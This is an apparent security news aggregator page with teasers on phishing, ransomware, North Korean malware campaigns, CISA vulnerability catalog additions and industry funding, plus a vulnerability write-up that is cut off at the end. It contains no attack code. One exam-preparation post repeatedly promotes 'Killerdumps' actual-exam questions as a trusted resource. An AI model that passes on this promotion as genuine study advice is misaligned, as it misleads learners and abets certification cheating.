A new wave of large-scale phishing attacks is exploiting Scalable Vector Graphics (SVG) files to bypass security measures, evade detection, and automate credential theft. Sophos researcher Andrew Brandt reports that these attacks, which have escalated significantly since mid-January 2025, use embedded JavaScript, Cloudflare CAPTCHA gates, and even malware payloads—making them more sophisticated than previous SVG … The post SVG Phishing Attacks Escalate, Now Using CAPTCHA for Evasion appeared first on CyberInsider.

by Cyber Insider

A Cisco Talos report also indicated a sharp increase in remote access tools being leveraged in ransomware. 

by Cybersecurity Dive

Spanish Police arrested an unnamed hacker who allegedly breached tens of government institutions in Spain and the US. Spanish National Police arrested a hacker responsible for multiple cyberattacks on government institutions in Spain and the U.S.. Targe including the U.S. Army, UN, NATO, and other agencies. Some of the breached organizations are the U.S. Army, […]

by Security Affairs

7AI has launched an agentic security platform, which uses AI agents to handle repetitive tasks. The post 7AI Launches With $36 Million in Seed Funding for Agentic Security Platform appeared first on SecurityWeek.

by SecurityWeek

British-based engineering firm IMI plc has disclosed a security breach after unknown attackers hacked into the company''s systems. [...]

by BleepingComputer

Onapsis announced Onapsis Control Central for SAP application security testing and custom code security supporting RISE with SAP transformations. As the latest addition to its Onapsis Control product line, Control Central is a reinvention of Onapsis’ award-winning Control product. Control Central is a key component of the Onapsis Secure RISE Accelerator, working to streamline and de-risk large RISE with SAP projects for global enterprises. For organizations driving DevSecOps initiatives, Control Central offers application security testing … More → The post Onapsis Control Central secures SAP software development lifecycle appeared first on Help Net Security.

by Help Net Security

Cyabra introduces Insights, a new AI-feature designed to transform complex social media disinformation data into clear, actionable answers in seconds. False narratives, fake accounts, and AI-generated content are spreading faster than ever, costing businesses and governments billions annually and eroding public trust and reputations. With AI-generated disinformation spreading six times faster than the truth—especially during high-stakes events like elections and holiday seasons—the need for rapid-response tools has never been more critical. Insights takes the complexity … More → The post Cyabra Insights protects against AI-driven digital disinformation appeared first on Help Net Security.

by Help Net Security

Passing the EC-Council ICS-SCADA (Industrial Control Systems - Supervisory Control and Data Acquisition) exam on your first attempt requires a well-structured preparation strategy, the right resources, and consistent effort. Here’s how I did it, along with tips and resources to help you succeed. Preparation Tips 1. Understand the Exam Objectives Familiarize yourself with the official EC-Council ICS-SCADA exam blueprint. Focus on key areas such as ICS-SCADA fundamentals, network protocols, threat modeling, vulnerability assessment, and incident response. 2. Create a Study Plan Dedicate 2-3 hours daily for at least 4-6 weeks. Break down the syllabus into manageable sections and allocate time for each topic. 3. Hands-On Practice Set up a virtual lab environment to practice ICS-SCADA concepts. Use tools like Wireshark, Nessus, and Metasploit to simulate real-world scenarios. 4. Take Notes and Revise Summarize key concepts in your own words for quick revision. Use flashcards for memorizing protocols, ports, and attack vectors. 5. Practice with Mock Exams Simulate the exam environment by taking timed practice tests. Analyze your performance and focus on weak areas. 6.Join Online Communities Participate in forums like Reddit, TechExams, or EC-Council’s official community to discuss doubts and share resources. Resources To ace the ICS-SCADA exam, you need reliable and up-to-date study materials. Here are the resources I used: 1. Official EC-Council Study Guide The official guide covers all exam topics in detail and is a must-have resource. 2. Online Courses Platforms like Udemy, Coursera, and Cybrary offer ICS-SCADA-specific courses. Look for courses with hands-on labs and practical exercises. 3. Books “Industrial Network Security: Securing Critical Infrastructure Networks” by Eric D. Knapp and Joel Thomas Langill. “Cybersecurity for Industrial Control Systems: SCADA, DCS, PLC, HMI, and SIS” by Tyson Macaulay. 4. Practice Tests Practice tests are crucial for understanding the exam format and identifying weak areas. Use platforms like Boson, Exam-Labs, and Killerdumps for high-quality practice questions. 5. Killerdumps This plat form has been a trusted resource for over 7 years, providing the best study material for certification exams. Their ICS-SCADA exam questions are highly accurate and closely aligned with the actual exam. The platform offers detailed explanations for each question, helping you understand the concepts thoroughly. Many candidates, including myself, have found this platform to be an invaluable resource for passing the exam on the first attempt. 6. Virtual Labs Use platforms like Hack The Box or TryHackMe to practice penetration testing and vulnerability assessment in a controlled environment. 7. YouTube Tutorials Channels like John Hammond, The Cyber Mentor, and NetworkChuck offer free tutorials on ICS-SCADA and related topics. Final Tips Stay consistent with your preparation and avoid last-minute cramming. Focus on understanding concepts rather than memorizing answers. Use Killerdumps for reliable ICS-SCADA exam questions and practice tests to build confidence. On exam day, read each question carefully and manage your time effectively. With the right preparation and resources, passing the EC-Council ICS-SCADA exam on your first attempt is absolutely achievable. Good luck!

by HACKLIDO

Experts question whether Edward Coristine, a DOGE staffer who has gone by “Big Balls” online, would pass the background check typically required for access to sensitive US government systems.

by WIRED Security News

Starting a security program can be challenging for some organizations, especially running a mature program across a large business. Resourcing, lack of organization, and not having a clear remediation strategy are key aspects to the failure of some programs, which can all result in severe breaches of businesses. I’ll walk through seven steps that will […] The post Six steps for running a successful security program appeared first on Outpost24.

by Outpost24

Malvertisers got inspired by the website for a German university to bypass ad security and distribute malware.

by Malwarebytes Labs

by ComputerWeekly

In this Help Net Security interview, Oliver Friedrichs, CEO at Pangea, discusses why strong data hygiene is more important than ever as companies integrate AI into their operations. With AI-driven applications handling sensitive enterprise data, poor access controls and outdated security practices can lead to serious risks. Friedrichs shares key best practices to mitigate risks, ensure data reliability, and adapt security strategies for the AI landscape. How do data hygiene practices align with broader cybersecurity … More → The post The overlooked risks of poor data hygiene in AI-driven organizations appeared first on Help Net Security.

by Help Net Security

Snyk’s integration with Google Cloud Security Command Center (SCC) enables CISOs and security teams to monitor and manage AppSec vulnerabilities and misconfigurations from Snyk alongside cloud security issues from Google Cloud, all within a single pane of glass.

by Snyk

AI is driving significant changes in attack sources, with 88% of enterprises observing an increase in AI-powered bot attacks in the last two years, according to Arkose Labs. 53% said they have lost between $10 million to over $500 million during the past two years due to negative consequences related to cyberattacks. Enterprises are investing heavily in AI-powered solutions, which make up 21% of cybersecurity budgets today and will increase to 27% by 2026. 62% … More → The post Enterprises invest heavily in AI-powered solutions appeared first on Help Net Security.

by Help Net Security

As cyber threats become more advanced, the need for strong leadership in cybersecurity is clearer than ever. Across Australia and New Zealand, cybersecurity leaders are on the front lines, protecting everything from financial systems to critical infrastructure. They are facing growing challenges as cybercriminals and state actors target key sectors, making their role in securing networks, strengthening resilience, and defending vital industries essential to our safety and economy. Recognizing the importance of cybersecurity, the Australian government has pledged $15–$20 billion by 2033–34 to enhance the nation’s cyber capabilities, including strengthening offensive cyber operations through the REDSPICE program. This move highlights the growing recognition of cybersecurity’s critical role in safeguarding the country. In this article, we spotlight the top 100 cybersecurity leaders in the ANZ region, individuals who are leading the charge to keep systems secure, shape policy, and create innovative solutions in the ever-evolving world of cybersecurity. Their expertise and efforts are vital in defending against digital threats and ensuring the resilience of our infrastructure. The Role of Cybersecurity Leaders in ANZ Region Cybersecurity leaders in the ANZ region play a multifaceted role, from securing critical infrastructure to leading innovative security strategies for organizations. Their efforts are not confined to internal risk management – they are also working collaboratively with both governments and private sectors to build stronger defenses against the ever-evolving threat landscape. The cybersecurity leaders in the region spans various industries, from banking to healthcare, government, and beyond. These leaders are instrumental in creating frameworks, driving policy changes, and advancing the development of next-gen security technologies that can stay ahead of the curve when it comes to evolving threats. Top 100 Cybersecurity Leaders in the ANZ Region Here is a list of 100 cybersecurity leaders in the ANZ region who have made remarkable contributions to the field, helping secure organizations and drive policy change in the face of growing cyber threats: Name Designation Organization Name Aaron Bailey CISO The Missing Link Aaron McKeown CISO Vector Limited Ad Wolst Head of Cyber Security Engineering & Platform Services Bupa Adwin Singh Cyber Security Domain Lead - CISO Office Inland Revenue NZ Akash Mittal CISO Sumitomo Forestry Australia Alissa Maclean Cyber Security Engineer Manager Australian Red Cross Lifeblood Alistair Vickers CISO Horizon Energy Group Limited Dr. Amit Chaubey CEO NIAD Technologies Anand Patil  Head of Cyber Security Teladoc Health Andy Tamara Head of Security humm group Andy Pace Network & Information Security Manager MediaWorks NZ Annie Hagar Cyber Security Partner Norton Rose Fulbright Antonio (Tony) Lou Cyber Security Manager Bendigo Health Anya Avinash Head of Cybersecurity Bank First Arun Singh ANZ Chief Information Security Officer Zip Co Babu Srinivas Global Head - Cyber Competency & Digital Trust BHP Barney Rehfisch IT Operations Manager Nando''s Australia & New Zealand Barry Anderson Information Security Architecture, Strategy and Engineering Manager HESTA Bethwyn Berry Head of Cybersecurity, PMO & Governance Bluescope Australian Steel Products (ASP) at Bluescope Callum Nelson CISO EBOS Group Limited Charles Gonzalez CISO Metcash Christopher Lowe GM Cybersecurity Ainsworth Game Technology Cody Keeltka CISO Australian Payments Plus Crispin Apsey Cyber Security and Operations Manager SecurePay Dan Maslin Global Chief Information Security Officer Monash University Dane Maslen CISO Kami Mohammad Arif Head of Information Security (CISO) Guild Group Darren Kane CISO nbn® Australia David Geber General Manager Information Security & Risk REST Dean Kastelic Security Advisor / vCISO Bapcor Limited Doug Hammond Chief Information Security Officer Uniting Care Edmond Loza Group Manager - Cyber Security Workwear Group Eshan Dissanayake CISO Officeworks Fred Hadad Chief Information Security Officer Excite Cyber Fred Thiele CISO Interactive Garry Bentlin Group CISO Nine George Abraham Chief Information Security Officer Frontier Software Grant Anthony CISO Orion Health Hari Jegatheeswaran Australian CISO & Head of APAC Cyber Operations Deloitte Australia Harsh Busa CISO Avant Mutual Ivan Dobay Senior Cybersecurity Risk and Governance Partner ANSTO James Ng General Manager - Cyber Security (CISO) Insignia Financial Jeff Whitton Founder Yirigga Jeremy Koster CISO Transgrid Johann Blignaut Head of Group IT Cyber & Data Protection Crown Resorts John Ooi CISO Australian Unity Kapil Yewale Head of Cybersecurity Clearview Kevin O Sullivan Acting Chief Solutions Officer/ Head of Cyber & Information Security Kinetic IT Kirk Stephen Head of Cyber Security Baby Bunting Lee Barney CISO TPG Telecom Leron Zinatullin Chief Information Security Officer Linkly Group Liam Connolly CISO SEEK Louisa Vogelenzang Head of Cybersecurity Asia Pacific & Japan (APJ) | BISO | Senior Director Dayforce Lukasz Gogolkiewicz Head of Cyber Security Accent Group Limited Luke E Cyber Security Defense Lead Bunnings Mackenzie Muir CISO Allianz Australia Manasseh Paradesi CISO Tyro Payments Mario Ellaz CISO AusNet Mark Leighton CISO Aurecon Mark Haldane Head of Cyber Defence Coles Group Mark Spadafora Chief Technology Officer National Cyber Security Centre Mazino Onibere Head of Cyber Security, Risk and Compliance Regis Aged Care Mohan Swamy Cyber Security Manger / leader Pacific Blue Australia Neha Sharma CISO The Star Entertainment Group Nidhin Tamil Chief Information Security Officer Boral Nigel Hedges General Manager - IT Security Risk & Compliance (CISO) Chemist Warehouse Jean-Baptiste B. CISO / Director of Technology - Security, Risk & Compliance AMP Peeyush Khare Head of Cyber Security Practice - APAC Tech Mahindra Pieter van der Merwe CISO Woolworths Group Pritam Rakshit CISO Cuscal Limited Richard Watson Global & Asia-Pacific Cybersecurity Consulting Leader EY Robert Turney CISO auDA - .au Domain Administration Ltd. Robert Veres CISO Colonial First State Roxanne (R) Pashaei CISO NSW Rural Fire Service Sam Fariborz CISO David Jones Sam Conde Head of IT - Security Dyson Group of Companies Samrat Seal Group Manager - Cyber Security Kmart Australia Limited Sanja Marais Chief Technology and Security Office Aspen Medical Santanu Laudh Chief Information Security Officer OFX Sara Abak CISO Intellihub Group Serkan Tek Infrastructure & Information Security Team Leader Premiere Retail Shane Marquis Manager Cyber Security Architecture Asahi Shannon Remedio Cyber Tech Engineering  Lead Bupa Sourish Datta CISO Victorian Government Stefan Sherkat CISO Reece Group Stephen Bennett Global Chief Information Security Officer Domino''s Pizza Enterprises Limited Steven Rebello CISO Endeavour Group Sunil Saale Chief Information Security Officer MinterEllison Tara Dharnikota Head of Information Security Management PEXA Terry Reidy Associate Director Cybersecurity Operations and Capability University of Melbourne Tharaka Perera Head of Information Security Estia Health Ltd Tharusha Udugama Cybersecurity Manager HPX Group Tim Litton Acharya CIO SafetyCulture Varun Balakrishnan CISO Healthscope Venkat Krishnan CISO TAL Australia Vijay Krishnan CISO UniSuper Vijay Narayanan CISO Mercy Health Australia Vishal Kumar Gupta Global IT Security Governance and Risk Lead Hansen Technologies Vishwanath Nair Head Cyber Risk & Compliance (CISO) BaptistCare Will Sharpe CISO Telstra Health

by The Cyber Express

Apple’s Safari browser includes several features aimed at enhancing privacy while browsing the web. Two of the most notable privacy features are Intelligent Tracking Prevention (ITP) and Private Browsing mode. Intelligent Tracking Prevention (ITP) Intelligent Tracking Prevention (ITP) is a feature built into Safari to prevent advertisers and websites from tracking your browsing activity across different sites. It works by limiting the ability of trackers (like cookies) to follow you across websites. ITP is enabled … More → The post How to customize Safari for private browsing on iOS appeared first on Help Net Security.

by Help Net Security

Cheap banking scams are often easier to pull off in a country with older devices, fewer regulations, and experienced fraudsters.

by Dark Reading

The gaming industry has grown into a massive global market, with millions of players engaging in online multiplayer…

by Hackread

The North Korea-linked APT group Lazarus uses a cross-platform JavaScript stealer to target crypto wallets in a new hacking campaign. Bitdefender researchers reported that the North Korea-linked Lazarus group uses fake LinkedIn job offers in the cryptocurrency and travel sectors to deliver a cross-platform JavaScript stealer to target crypto wallets in a new hacking campaign. Scammers lure […]

by Security Affairs

<p>The Payment Card Industry Security Standards Council (PCI SSC) just announced a change to Self Assessment Questionnaire A (SAQ A). The change eliminates two (2) requirements relevant to eCommerce sites, 6.4.3 and…</p>

by TrustedSec

San Francisco application security startup raises $100 million in a Series D funding round led by Menlo Ventures.  The post Semgrep Raises $100M for AI-Powered Code Security Platform appeared first on SecurityWeek.

by SecurityWeek

Elon Musk''s DOGE has taken control and accessed large swathes of Americans'' private information held by the U.S. federal government. © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

WhatsApp said users in several European countries were targeted with Paragon spyware, according to the Italian government. © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

Chrome isn''t the most secure browser on the market and with the continued rise of malicious attacks, you should consider one of these Chrome-based alternatives

by ZDNET Security

U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Linux kernel vulnerability to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a Linux kernel vulnerability, tracked as CVE-2024-53104, to its Known Exploited Vulnerabilities (KEV) catalog. The February 2025 Android security updates addressed 48 vulnerabilities, the zero-day flaw CVE-2024-53104 which is actively exploited in attacks […]

by Security Affairs

Proton Pass and 1Password offer secure password safekeeping with similarly priced plans. Still, one service may suit your needs better than the other. Here''s how to pick the right one.

by ZDNET Security

The North Korea-linked Lazarus Group has been linked to an active campaign that leverages fake LinkedIn job offers in the cryptocurrency and travel sectors to deliver malware capable of infecting Windows, macOS, and Linux operating systems. According to cybersecurity company Bitdefender, the scam begins with a message sent on a professional social media network, enticing them with the promise of

by The Hacker News

While probabilities may be based on subjective information, when used in an objective framework, they demonstrate an effective way to improve the value of hard decisions.

by Dark Reading

The company''s annual reflection on safe AI development comes amid shifting guidance around military AI.

by ZDNET Security

Ransomware payments fell by more than one-third in 2024 as an increasing number of victims refused to negotiate with hackers. In a report published Wednesday, crypto forensics firm Chainalysis said that while ransomware gang leak sites posted more victims than in previous years during 2024, fewer victims gave in to the hackers’ demands. Chainalysis reported […] © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

Cloud computing powers everything from remote work to large-scale data analytics. But its vulnerabilities continue to challenge organizations of all sizes. 

by Legit Security

If your business processes credit card data, protecting client information is a key responsibility. The Security Standards Council (SSC) developed Payment Card Industry (PCI) Data Security Standards (DSS) to make these protections easier to achieve.

by Legit Security

Static Application Security Testing (SAST) and Dynamic Application Security Testing (DAST) spot application vulnerabilities at different development and deployment stages. 

by Legit Security

Cybercriminals are increasingly leveraging legitimate HTTP client tools to facilitate account takeover (ATO) attacks on Microsoft 365 environments. Enterprise security company Proofpoint said it observed campaigns using HTTP clients Axios and Node Fetch to send HTTP requests and receive HTTP responses from web servers with the goal of conducting ATO attacks. ""Originally sourced from public

by The Hacker News

Microsoft has released a PowerShell script to help Windows users and admins update bootable media so it utilizes the new ""Windows UEFI CA 2023"" certificate before the mitigations of the BlackLotus UEFI bootkit are enforced later this year. [...]

by BleepingComputer

A previously undocumented threat actor known as Silent Lynx has been linked to cyber attacks targeting various entities in Kyrgyzstan and Turkmenistan. ""This threat group has previously targeted entities around Eastern Europe and Central Asian government think tanks involved in economic decision making and banking sector,"" Seqrite Labs researcher Subhajeet Singha said in a technical report

by The Hacker News

The latest target of Paragon spyware openly questions if he was targeted by the Italian government. © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

Veeam has released patches to address a critical security flaw impacting its Backup software that could allow an attacker to execute arbitrary code on susceptible systems. The vulnerability, tracked as CVE-2025-23114, carries a CVSS score of 9.0 out of 10.0. ""A vulnerability within the Veeam Updater component that allows an attacker to utilize a Man-in-the-Middle attack to execute arbitrary code

by The Hacker News

The dismantling of USAID by Elon Musk''s DOGE and a State Department funding freeze have severely disrupted efforts to help people escape forced labor camps run by criminal scammers.

by WIRED Security News

New research highlights how bad actors could abuse deleted AWS S3 buckets to create all sorts of mayhem, including a SolarWinds-style supply chain attack.

by Dark Reading

The SVG file format can harbor malicious HTML, scripts, and malware

by Sophos News

Human communication is multimodal. We receive information in many different ways, allowing our brains to see the world from various angles and turn these different “modes” of information into a consolidated picture of reality. We’ve now reached the point where artificial intelligence (AI) can do the same, at least to a degree. Much like our […] The post Stress-testing multimodal AI applications is a new frontier for red teams appeared first on Security Intelligence.

by Security Intelligence

Enterprises are shifting from chasing trends to strategically modernizing legacy systems, leveraging existing infrastructure with modern enhancements to maximize business value and future-proof operations.

by ITPro Today

A newly disclosed vulnerability affecting AMD''s Zen 1 through Zen 4 CPUs allows attackers with local administrator privileges to load malicious microcode patches, potentially compromising confidential workloads. The issue, discovered by Google''s Security Team, stems from the use of an insecure hash function in AMD''s microcode signature verification process, raising concerns over Secure Encrypted Virtualization-Secure … The post AMD EPYC and Ryzen CPUs Affected by Severe Security Flaw appeared first on CyberInsider.

by Cyber Insider

A threat actor known as FutureSeeker has leaked a database allegedly stolen from Trump Hotels, exposing the personal details of over 164,900 individuals. The dataset, allegedly sourced from Trump Hotels'' invitations list, was posted on BreachForums yesterday. The leaked records include full names, email addresses, invitation statuses, and timestamps, raising concerns about potential phishing attacks … The post Trump Hotels Allegedly Breached, 164,900 Records Leaked Online appeared first on CyberInsider.

by Cyber Insider

As the cybersecurity landscape continues to evolve, proactive vulnerability management has become a critical priority for managed service providers (MSPs) and IT teams. Recent trends indicate that organizations increasingly prioritize more frequent IT security vulnerability assessments to identify and address potential security flaws. Staying informed on these trends can help MSPs and IT teams

by The Hacker News

The FCC has proposed a $4,492,500 fine against VoIP service provider Telnyx for allegedly allowing customers to make robocalls posing as fictitious FCC ""Fraud Prevention Team,"" by failing to comply with Know Your Customer (KYC) rules. However, Telnyx says the FCC is mistaken and denies the accusations. [...]

by BleepingComputer

A banking malware campaign using live phone numbers to redirect SMS messages has been identified by the zLabs research team, uncovering 1,000+ malicious apps and 2.5GB of exposed data.

by Hackread

Web shops are an attractive target. How can SMBs keep theirs safe?

by Malwarebytes Labs

A sophisticated cyberattack campaign is targeting organizations that still rely on Active Directory Federation Services (ADFS) for authentication across applications and services.

by Dark Reading

Never lose your wallet again with Apple AirTag tracking accessories from expert-tested brands like Nomad, ESR, Ridge, and more.

by ZDNET Security

Simple tips for fighting spam email.

by Kaspersky

Payments to ransomware actors decreased 35% year-over-year in 2024, totaling $813.55 million, down from $1.25 billion recorded in 2023. [...]

by BleepingComputer

Assad regime effectively exploited the region''s existing disinformation networks, inserting narratives into popular sociopolitical causes The post Assad’s silent network: Syrian influence operations in Latin America appeared first on DFRLab.

by DFRLab

A malware campaign has been observed delivering a remote access trojan (RAT) named AsyncRAT by making use of Python payloads and TryCloudflare tunnels. ""AsyncRAT is a remote access trojan (RAT) that exploits the async/await pattern for efficient, asynchronous communication,"" Forcepoint X-Labs researcher Jyotika Singh said in an analysis. ""It allows attackers to control infected systems

by The Hacker News

U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Microsoft .NET Framework, Apache OFBiz, and Paessler PRTG Network Monitor flaws to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: In September 2024, Apache fixed a high-severity vulnerability, tracked as CVE-2024-45195 (CVSS score: 7.5) […]

by Security Affairs

2025-02-05 14:50:00

MySpace? Your security

In the early 2000s, one of the hardest choices many of us faced online was selecting our MySpace “Top 8”... The post MySpace? Your security appeared first on Sysdig.

by Sysdig

The Blink Mini 2 is a feature-rich security camera that you can get for $20. An extra $10 gets you a waterproof adapter that makes the deal that much sweeter.

by ZDNET Security

Enabling Private DNS Mode on Android means your searches and other DNS queries are encrypted and safe from prying eyes. Here''s everything else you need to know.

by ZDNET Security

Silver Spring, Maryland, 5th February 2025, CyberNewsWire

by Hackread

Cloudflare achieves ENS certification, and intends to pursue FedRAMP High and IRAP.

by Cloudflare

The rising influence of artificial intelligence (AI) has many organizations scrambling to address the new cybersecurity and data privacy concerns created by the technology, especially as AI is used in cloud systems. Apple addresses AI’s security and privacy issues head-on with its Private Cloud Compute (PCC) system. Apple seems to have solved the problem of […] The post Cybersecurity awareness: Apple’s cloud-based AI security system appeared first on Security Intelligence.

by Security Intelligence

Our zLabs research team has discovered a mobile malware campaign consisting of almost 900 malware samples primarily targeting users of Indian banks. The post Mobile Indian Cyber Heist: FatBoyPanel And His Massive Data Breach appeared first on Zimperium.

by Zimperium

​CISA has ordered federal agencies to secure their systems within three weeks against a high-severity Linux kernel flaw actively exploited in attacks. [...]

by BleepingComputer

Canadian man charged in $65 million DeFi hack. Exploited KyberSwap, Indexed Finance smart contracts, laundered funds, and attempted extortion. Faces 20 years.

by Hackread

A help desk phishing campaign targets an organization''s Microsoft Active Directory Federation Services (ADFS) using spoofed login pages to steal credentials and bypass multi-factor authentication (MFA) protections. [...]

by BleepingComputer

Accessibility is still vital for businesses despite recent federal actions.

by ITPro Today

Ransomware gangs continued to wreak havoc in 2024, but new research shows that the amounts victims paid these cybercriminals fell by hundreds of millions of dollars.

by WIRED Security News

The ALPHV ransomware group, also known as BlackCat, emerged in November 2021 as a sophisticated cybercrime organization operating under a Ransomware-as-a-Service (RaaS) model. In February 2024, they attacked UnitedHealth Group''s subsidiary, Change Healthcare, leading to significant disruptions in the U.S. healthcare sector. UnitedHealth paid a $22 million ransom to ALPHV following the attack. The breach compromised the personal information of over 100 million individuals, marking the largest healthcare data breach in U.S. history. The U.S. Department of State has offered rewards of up to $10 million for information leading to the identification or location of ALPHV/BlackCat leaders. 

by Picus Security

In late 2024, Kaspersky experts discovered a malicious campaign, called SparkCat, spreading malware to target crypto wallets. In March 2023, ESET found malware in modified versions of messengers using OCR to scan the victim’s gallery for images with recovery phrases to restore access to crypto wallets. In late 2024, Kaspersky discovered a new malicious campaign, […]

by Security Affairs

Overview  The Cybersecurity and Infrastructure Security Agency (CISA) has recently added four vulnerabilities to its Known Exploited Vulnerabilities Catalog. These vulnerabilities, identified in widely-used software products, have been actively exploited by cyber attackers.   With these updates, CISA highlights the importance of addressing these flaws promptly to mitigate the risks they pose, particularly to federal enterprises and other critical infrastructure sectors. The newly added vulnerabilities include CVE-2024-45195, CVE-2024-29059, CVE-2018-9276, and CVE-2018-19410, all of which could have severe consequences for the security of affected systems.  Detailed List of Vulnerabilities Highlighed in the Known Exploited Vulnerabilities Catalog  CVE-2024-45195: Apache OFBiz Forced Browsing Vulnerability  The first of the vulnerabilities, CVE-2024-45195, relates to a flaw in Apache OFBiz, an open-source enterprise resource planning (ERP) and e-commerce solution. This vulnerability is a forced browsing issue, where attackers can gain unauthorized access to certain parts of a website by bypassing security restrictions through direct URL requests. The flaw was discovered in Apache OFBiz versions before 18.12.16, and users are advised to upgrade to this version or later to mitigate the threat.  The vulnerability can allow attackers to gain unauthorized access to sensitive data by leveraging weak authorization mechanisms. It is listed in the CISA Known Exploited Vulnerabilities Catalog due to active exploitation, with evidence showing malicious actors targeting vulnerable systems to escalate privileges.   CVE-2024-29059: Microsoft .NET Framework Information Disclosure  The second addition, CVE-2024-29059, is a critical information disclosure vulnerability affecting Microsoft .NET Framework. This flaw can allow attackers to access sensitive information stored within the system by exploiting weaknesses in error handling. With a CVSS score of 7.5 (High), this vulnerability is serious and can be exploited by attackers to access privileged information in systems running older versions of .NET Framework, specifically 4.8, 3.5, and 4.7.2.  The impact of this vulnerability is widespread, affecting Windows 10 and Windows Server versions, making it a concern for organizations relying on these platforms. The flaw is also listed in CISA''s Known Exploited Vulnerabilities Catalog, reinforcing its immediate need for attention and patching to prevent potential breaches.  CVE-2018-9276: Paessler PRTG Network Monitor OS Command Injection  Another critical vulnerability is CVE-2018-9276, a command injection flaw discovered in PRTG Network Monitor versions prior to 18.2.39. This vulnerability allows attackers with administrator privileges on the system to inject operating system commands into the network monitor system. By sending malformed parameters to the system, attackers can execute arbitrary commands both on the server and on networked devices.  PRTG Network Monitor is widely used for IT network monitoring, and an attacker exploiting this flaw could gain complete control over the system and its connected infrastructure. This vulnerability has been identified as a significant attack vector for malicious actors, potentially compromising entire networks. Users of affected versions must update their software to address this flaw.  CVE-2018-19410: Paessler PRTG Network Monitor Local File Inclusion  Another vulnerability in PRTG Network Monitor, CVE-2018-19410, involves a Local File Inclusion (LFI) issue, which allows unauthenticated attackers to bypass security mechanisms and escalate privileges. Attackers exploiting this flaw can create users with read-write privileges, including administrator-level access, by crafting malicious HTTP requests. This vulnerability has been confirmed to affect PRTG versions before 18.2.40.1683.  Once exploited, this flaw can lead to severe compromises in the security of networked systems by allowing attackers to perform unauthorized actions, such as adding new administrative users and accessing sensitive data. CISA included this vulnerability in its Known Exploited Vulnerabilities Catalog after determining that it was actively being targeted by cybercriminals.  Conclusion   The vulnerabilities identified by CISA, such as CVE-2024-45195, CVE-2024-29059, CVE-2018-9276, and CVE-2018-19410, highlights the ongoing cybersecurity trends particularly in the vulnerability space. Organizations are encouraged to regularly monitor for updates and patch their systems without delay.   Additionally, Cyble offers a powerful AI-driven threat intelligence platform that helps organizations stay protected of cybercriminals by providing continuous monitoring, actionable insights, and timely alerts about vulnerabilities and cyber risks. With its cutting-edge technologies like Cyble Vision, Cyble empowers businesses, federal agencies, and individuals to strengthen their cybersecurity posture.   By leveraging Cyble''s tools for vulnerability management, dark web monitoring, and attack surface management, organizations can better protect sensitive data and critical infrastructure from exploitation.   The post CISA Adds New Vulnerabilities to Known Exploited Vulnerabilities Catalog – Critical Updates Required  appeared first on Cyble.

by CYBLE

Compensations for scam victims, and millionaires losing their family to COVID-19: read on to learn about the types of ""Nigerian"" spam one could come across in 2024.

by Securelist

The Trump administration is scrutinizing the AI app, Italy and Taiwan have banned it, and companies have blocked it.

by Cybersecurity Dive

Learn how to build and customize grid-based GUIs in PowerShell using Windows Presentation Foundation.

by ITPro Today

Cyberattacks using ransomware spiked in the second half of the year, but fewer victims paid up.

by Cybersecurity Dive

Public Certificate Authorities (CAs) play a crucial role in maintaining internet trust, but not all CAs meet the highest standards. True CA leadership is built on three pillars: ethical excellence, which prioritizes public trust over corporate interests; technical excellence, which ensures security through automation and innovation; and intellectual excellence, which drives industry thought leadership. Sectigo exemplifies these principles, leading the way in responsible CA practices, transparency, and security advancements.

by Sectigo

Researchers at Kaspersky have uncovered a sophisticated malware campaign dubbed SparkCat, which infects both Android and iOS applications to steal cryptocurrency wallet recovery phrases. The malware, embedded in apps available on Google Play and Apple''s App Store, uses Optical Character Recognition (OCR) to scan image galleries for sensitive information. This marks the first time a … The post “SparkCat” Malware Found in Google Play and Apple App Store appeared first on CyberInsider.

by Cyber Insider

The company agreed to cover expenses related to recovery from the December cyberattack.

by Cybersecurity Dive

The Cybersecurity and Infrastructure Security Agency (CISA) has recently updated its Known Exploited Vulnerabilities (KEV) Catalog by adding several new vulnerabilities that have been actively exploited by cybercriminals.   These vulnerabilities, found in widely-used software products, pose cybersecurity risks, especially to federal enterprises and critical infrastructure sectors. The newly added vulnerabilities include CVE-2024-45195, CVE-2024-29059, CVE-2018-9276, and CVE-2018-19410—all of which can have severe consequences for the security of affected systems.  Overview of the New Known Exploited Vulnerabilities CVE-2024-45195: Apache OFBiz Forced Browsing Vulnerability  The first vulnerability, CVE-2024-45195, is a critical flaw in Apache OFBiz, an open-source enterprise resource planning (ERP) and e-commerce solution. This vulnerability is associated with forced browsing, which allows attackers to bypass security restrictions by directly accessing specific URLs, potentially revealing sensitive data.  Discovered in Apache OFBiz versions earlier than 18.12.16, this vulnerability could enable unauthorized access to various website sections, depending on the implementation of weak authorization mechanisms. Attackers may exploit this flaw to escalate privileges and gain access to sensitive data, including private user information or other confidential details.  The CVE-2024-45195 vulnerability has been included in the CISA Known Exploited Vulnerabilities Catalog because of its active exploitation, which makes it critical for organizations using Apache OFBiz to upgrade their software to version 18.12.16 or later.  CVE-2024-29059: Microsoft .NET Framework Information Disclosure  Another serious vulnerability added to the Known Exploited Vulnerabilities Catalog is CVE-2024-29059, affecting the Microsoft .NET Framework. This information disclosure vulnerability enables attackers to gain access to sensitive information from systems running older versions of .NET Framework, such as 4.8, 3.5, and 4.7.2.  This flaw can be exploited by attackers leveraging weaknesses in error handling within the system. With a CVSS score of 7.5 (High), it poses a significant risk to organizations using Windows 10 or Windows Server versions, where the CVE-2024-29059 vulnerability is prevalent.  Given its potential impact, CISA has listed CVE-2024-29059 in its catalog of known exploited vulnerabilities, urging organizations to quickly apply patches or updates to protect their systems from data exposure and potential breaches.  CVE-2018-9276: Paessler PRTG Network Monitor OS Command Injection  The CVE-2018-9276 vulnerability relates to a critical flaw found in Paessler PRTG Network Monitor, a tool widely used for IT network monitoring. This vulnerability, identified in versions prior to 18.2.39, is a command injection issue that allows attackers with administrator privileges to inject operating system commands into the system.  By exploiting this flaw, attackers could execute arbitrary commands not only on the PRTG server but also on connected network devices, potentially compromising entire network infrastructures. For organizations relying on PRTG to monitor their network 